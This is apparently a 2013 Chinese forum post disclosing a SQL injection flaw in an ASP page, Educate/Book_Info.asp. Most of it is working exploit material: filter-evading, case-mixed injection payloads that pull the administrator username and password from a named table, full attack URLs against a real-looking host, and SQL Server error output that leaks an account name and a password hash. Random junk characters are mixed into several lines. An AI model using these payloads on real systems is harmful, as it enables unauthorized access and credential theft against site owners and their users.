漏洞出现在Educate/Book_Info.asp5 a4 a$ r1 @% l9 X! Q1 Z
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出* l- e) |, j: A, o- v$ U3 B. `
exp:如下* U7 q8 I) a0 ?' H9 _: S d* ~
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper). z) L" n) C% L
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
" X3 b0 M7 p" j& Z: p7 | U8 _http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper), g: \- i7 C- h9 D+ T# U
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
& K \! H5 [$ O) P# Y& d" y) k8 [将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
) M ^: }4 q- S4 E, D/ F/Educate/Book_Info.asp,行 8
' f& f; B0 W( P+ [! Q/ N8 l! x: @http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)9 i7 ]% V, D/ f p7 I/ v e" ]4 ~$ G5 }
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
. L$ R; g- S7 S4 P+ f- N将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。8 V" s0 m5 J8 f h
/Educate/Book_Info.asp,行 8 |
发表于 2013-2-13 23:56:06
收藏
支持
反对